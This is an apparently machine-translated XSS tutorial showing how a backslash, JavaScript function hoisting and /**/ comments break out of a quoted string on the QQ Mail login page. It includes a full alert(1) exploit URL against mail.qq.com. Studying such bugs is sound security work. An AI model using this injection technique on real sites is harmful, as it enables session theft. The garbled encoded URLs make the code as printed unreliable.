In those years, we will learn XSS-5. backlash revenge

In some cases, we only need a backslash to bypass filtering. Details: 1. There are the following instance points. http://mail.qq.com/cgi-bin/login?vt=passport&ss= Aaa & from = bbb & delegate_url = % 2Fcgi-bin % 2Fframe_html % 3 Furl % 3D % 25252Fcgi-bin % signature % 25253 Faction % 25253 Dlist % 252526 t % signature % 252526ss % 25253 Dindex % 252526 Mtype % 25253D1% 252526 clickpos % 25253D20% 252526loc % 25253 Ddelegate % 25252 Cwebmap % 25252C % 25252C1 corresponding output, as shown in: after testing, we can see that double quotation marks cannot be used, but the backslash can also be used. Can XSS be successful? We extract part of the defect code. <Script> getTop (). location. href = "/cgi-bin/loginpage? Autologin = n & errtype = 1 & verify = & clientuin = "+" & t = "+" & alias = "+" & regalias = "+" & delegate_url = % 2Fcgi-bin % 2Fframe_html % 3 Furl % 3D % 252Fcgi-bin % 252Fsetting10% 253 Faction % 253 Dlist % 2526 t % tags % 2526ss % 253 Dindex % 2526 Mtype % 253D1% 2526 clickpos % 253D20% 2526loc % ddelegate % 252 Cwebmap % 252C % 252C1 "+" & title = "+" & url = % 2Fcgi-bin % 2 Flogin % 3Fvt % 3 Dpassport % 26ss % 3 Daaa % 2522% 26 from % 3 Dbbb % 5C % 26delegate_url % 3D % 252Fcgi-bin % 252Ffr Ame_html % 253 Furl % 253D % alert % 2525253 Faction % 2525253 Dlist % 25252526 t % alert % 25252526ss % 2525253 Dindex % 25252526 Mtype % 2525253D1% 25252526 clickpos % 2525253D20% 25252526loc % 2525253 ddelegate % 2525252 Cwebmap % 25252c % 25252c1 "+" & org_fun = "+" & aliastype = "+" & ss = aaa "+" & from = bbb "+" & param = "+" & sp = 6fa57ce5b3047ebMTM1NTQwOTA2Mg "+" & r = 3ec785174fff5206ed6f0cf4a8c5e3c5 "+" & ppp = "+" & secpp = "</Script> 2. the defective part is location. href = "......... "+" & ss = aaaa "+" & from = bbb "+" & param = "; // is omitted later. What we can control is aaaa, and we cannot use it. "What should we do? Because we can use \, we can kill the double quotation marks behind aaaa. Location. href = "......... "+" & ss = aaaa \ "+" & from = bbb "+" & param = "; you can see that the code result has changed because of a backslash, for example: to ensure the correctness of the syntax after bbb, we change bbb to a number and add // to the end of bbb to comment out the subsequent part. In the following format. Location. href = "......... "+" & ss = aaaa \ "+" & from = 1 // "+" & param = "; 3. it looks good, but there will be some problems, "string" & from = 1, this is wrong, because & Symbol priority is high, ("string" & from) = 1 is not allowed to perform this assignment operation. This still does not work. Don't worry. We can change it a bit. In the following format. Location. href = "......... "+" & ss = aaaa \ "+" & from = 1 // "+" & param = "; Because = has a higher priority, therefore, the statement is equivalent to ("string") & (from = 1) 4. it's even better, but it's still a tragedy. Because the from statement is not defined, an error is returned if the result is equal to 1. The error is "from... What should we do? 5. Don't be nervous. javascript has a feature. Aaa (); function aaa () {} All functions defined in the form of function xxx () {} Will be parsed with the highest priority. In other words, when parsing JS code segments, the parser obtains function xxx () {} to the beginning for parsing, and then parses other parts in sequence. In other words, the actual parsing order of the above Code is: function aaa () {} aaa (); our code can be modified by using this feature. Location. href = "......... "+" & ss = aaaa \ "+" & from = 1; function from () {}// "+" & param = "; in this way, our function from () {} Will be parsed in advance to define the from. When the following from = 1, no error will be reported ~~ 6. The story is often tortuous. At this step, we will find that it is still not good. Let's take a look at the source code ~~ Ah, our space is escaped to & nbsp; 7. Of course, we can't find such a small thing. We use annotator as the separator. /**/Replace spaces. Do you think it is the same as SQL injection. So our code is changed to location. href = "......... "+" & ss = aaaa \ "+" & from = 1; function/**/from () {}// "+" & param = "; 8. well, there is no syntax error this time. We can insert our own JS Code. Location. href = "......... "+" & ss = aaaa \ "+" & from = 1; alert (1); function/**/from () {} // "+" & param = "; the final exploitation code is as follows: http://mail.qq.com/cgi-bin/login?vt=passport&ss= \ & From = 0; alert (1); function/**/from (){}; // & delegate_url = % 2Fcgi-bin % 2Fframe_html % 3 Furl % 3D % 25252Fcgi-bin % conflict % 25253 Faction % 25253 Dlist % 252526 t % conflict % 252526ss % 25253 Dindex % 252526 Mtype % 25253D1% 252526 clickpos % 25253D20% 252526loc % 25253 Ddelegate % 25252 Cwebmap % 25252C % 25252C1 -------------------------- well, this is our backslash to avenge double quotation marks!

It is triggered only when you do not log on to the QQ mailbox. It is of little practical significance and is only for research. Solution: 1. Repair as needed. 2. In some cases, \ is still very dangerous.